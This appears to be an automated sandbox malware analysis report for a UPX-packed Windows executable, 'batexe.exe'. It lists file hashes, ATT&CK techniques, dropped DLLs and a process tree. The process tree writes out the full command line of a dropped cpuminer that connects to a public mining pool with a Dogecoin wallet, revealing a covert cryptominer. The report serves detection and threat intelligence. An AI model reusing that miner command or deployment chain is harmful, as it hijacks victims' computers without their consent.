73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 02:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
1192	b2e.exe
2024	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2024	cpuminer-sse2.exe
2024	cpuminer-sse2.exe
2024	cpuminer-sse2.exe
2024	cpuminer-sse2.exe
2024	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1712-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1712 wrote to memory of 1192	1712	batexe.exe	85
PID 1712 wrote to memory of 1192	1712	batexe.exe	85
PID 1712 wrote to memory of 1192	1712	batexe.exe	85
PID 1192 wrote to memory of 456	1192	b2e.exe	86
PID 1192 wrote to memory of 456	1192	b2e.exe	86
PID 1192 wrote to memory of 456	1192	b2e.exe	86
PID 456 wrote to memory of 2024	456	cmd.exe	89
PID 456 wrote to memory of 2024	456	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1712
- C:\Users\Admin\AppData\Local\Temp\6BE9.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6BE9.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6BE9.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6E79.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:456
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6BE9.tmp\b2e.exe

Filesize
4.9MB

MD5
30b4e9e5222fed242afabcce2460c360

SHA1
39a356be954bdea8407145f81402e451181ff2a4

SHA256
09805d06c6c8aa6fa18515f750518ea6be7d5bc67609049f220c855433119904

SHA512
f385756f343b1f8f6b316d6ed9abc14565148eb32eb91ea17fd75d81a51166f882c3148dd5fd9fb1e79622dee01f3977b4f44f761e125672882cea6f5fec940c

Download Submit
C:\Users\Admin\AppData\Local\Temp\6BE9.tmp\b2e.exe

Filesize
3.1MB

MD5
b10693367bf3dbd8cb8d7c3046062904

SHA1
635229ce2ea5b20bccf4c1cd61765d73ab1a2c7f

SHA256
e1c558ba627af63718647406fabea0a6d7cf27eb997aa2a09f1b41d658578121

SHA512
eeb272632cbde9bff88e402d8a8bf0f533d16273ebad8b0f7b6df835ba4bcc4dcf1ae65bdd5f55bb62b4568f05cface29768bc67967f90ce039bfa307c1f4ba6

Download Submit
C:\Users\Admin\AppData\Local\Temp\6BE9.tmp\b2e.exe

Filesize
2.1MB

MD5
b415142fa88f39e7f32152bd096d94b6

SHA1
ce5412099941d660558fc75fe0d51f33ed7592dc

SHA256
fa0a44aaf6552fce6e65c34c9882e190ae36f1eb7a20f2568a6d039d17de729e

SHA512
d2f384ba96e1b79273e811b95c92751afe5e25f3d7da5d6562b420f368ddc2c7fd55872b3aae2fad195e5bf55068965f7b12ced4953562f953a8213c35861e04

Download Submit
C:\Users\Admin\AppData\Local\Temp\6E79.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
559KB

MD5
c9290ea5aa7c8c6855fd35d6a63e4ed0

SHA1
9f168613d72b32af7513e033a9c52b5b8683ac85

SHA256
388ee02dcb27cd0c52400fc90baa70cb71eb3870adf529ee94b977b8625535ed

SHA512
d9aee7b03c034d0d30c9f195ca19b08acafb169ebf49994563b8028ce2a780b5318c78aa0f8b68d59e5ed381252154b107708ddf4e08d83b29d5c54368506d38

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
523KB

MD5
2a90efe160545c6bdc5fd3ae9a07fd62

SHA1
5d081a8c96c4e29ab7c22cac296234ef8b05de08

SHA256
00b195d752bc5e5b34825e7d2200886f2cac6813acfe967b5207422f579aa83a

SHA512
49272e9e0360042293ea4489c329a4daec6c235abf0789e61d9d36813be0cb180d103b2dcee8338f9be75e139b51bf04f85b3eff30c5b6bd20eb787a24609e49

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
356KB

MD5
30b42088cec428ebb99775434ef43aff

SHA1
9539b81ae8532cbd5f2cc0d9b80df653ca6eeedc

SHA256
86fd0ce8ef4fdd1d530101e4af5852ed5d831213ea03612421c7578a78650e54

SHA512
55d7b4cc1902c77b7a33058a00a334361418788189febcfebf6b36c9443b61d656a7ad560aa2dba4275fa2398299c7259ea7ac02a377a13b1fb2c0c78c50a0d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
422KB

MD5
25db5830229345ecc770e589bd1d1a02

SHA1
b30d7571b0934be5756c8d3ed0880c4861c8e2ee

SHA256
6b91fee188f840f840fdf51467d6a7fd01b1f181b09eea19e1a94a3591aa5b8f

SHA512
9ccfbdece79bf233087fb5eef9150d0e754432d26953531c160ce943136e841fe93782c714b36ecd06cb82ed43ed46776596b58533b38dde8ebd39403b5bf209

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
496KB

MD5
1fcfed41637ebc4b63de6eaf07dfb23f

SHA1
4fba68506f00f93ecbd3152315b0d520fbdf9aed

SHA256
b939e6e73722f70c853ce140e2effb1a9fc4a8b5c3f17698874cc66a2354a19f

SHA512
8e2152a398d5c4accf741cf1984f78e3de40e33564f810988aa97ddd75c896048f8bc88418dd4cde9cfc3786aff586455d8ac6e323ed4c80a4750f234325e95a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
606KB

MD5
833f57ea8de930bdcf754b7f6dbc9646

SHA1
fd2e7d708d49d51af2ea55509e7f45542493e4d5

SHA256
220e72e11cb9b0da4ff15a791bc81ddee5f200d36881f8d61bbcc62efc0c78ff

SHA512
25ebcfcc4e6e6f6c73b9a2beb80ec9198df125fd24439d49fc733fefd915fb09866343dc4d1f42bce60083c1e0a48369adadb7353d1a8f64f431895a9aed1163

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
670KB

MD5
e6cbad6973b6f2b9c1d75de413f50ba8

SHA1
8102d5bcbed0b097a20179c3e118239c956b940f

SHA256
6ad2ccd1c98b9a9d7bebef3076a6ac51b028228a8d450623e5d692af71da361f

SHA512
10abc19e1d9f958ab57cda5343d78dc1edffdf294c9ff16b2b1c065b2456c401f2b9ad2bb4f4e52c5963191fdd9747309a85636c5918f7ec96cbc87f175530ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
482KB

MD5
4debb7b1fce4ced21577a951a574511d

SHA1
1f69906c8ec60c21a4229bb7f59e4ea3345dcea1

SHA256
a1e6c8ba634ca1dfb8469661ebfdf2b55aee05893d768aa4388212da2641eaad

SHA512
7df96d6a1fdc84f72834ef67aa3840a19840092c10d2fdb3c041d0edb7aea3a9677aad4144f97ae86fc8e8b89749173429e698b5c4138b4f0e4bdd9c3ae1d31f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
611KB

MD5
7859fcf8dfe4ed3139691039d47603c8

SHA1
46c7f9d0d0081138ce184ff4c5878e0862596084

SHA256
d346e9faf58e31091af24e9bb887b304d52344f6a8329423bdffb8cc58304f7b

SHA512
3e0d08c711d4ebf8bf6824a3e5cd01f2d24c36f2e4a284f43d843c20222588e160a554d638ed0d00510062a58cbfa00e6e89ce18c319dcf336b6703381f028fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
508KB

MD5
607d9e2d8be26974bde85e37b0e6f2b9

SHA1
0c0c43c3653ce0162fc9bb16194ae883199e8709

SHA256
4e0e409f19f5b9d4292183cf2c9760a3b9a5431ed07ce5596fee792670de703b

SHA512
fd640d2c97fdd10d50cf07fb2d72d4289902273b43b23caeb7df295f13f43aacb9a379b043cf53edc0cfd365f41cfed54692d3402d6201b3280272ead756eb35

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1192-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1192-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1712-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2024-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2024-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2024-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2024-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2024-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2024-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2024-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2024-46-0x0000000067D60000-0x0000000067DF8000-memory.dmp

Filesize
608KB

Download
memory/2024-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2024-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2024-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2024-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2024-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2024-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download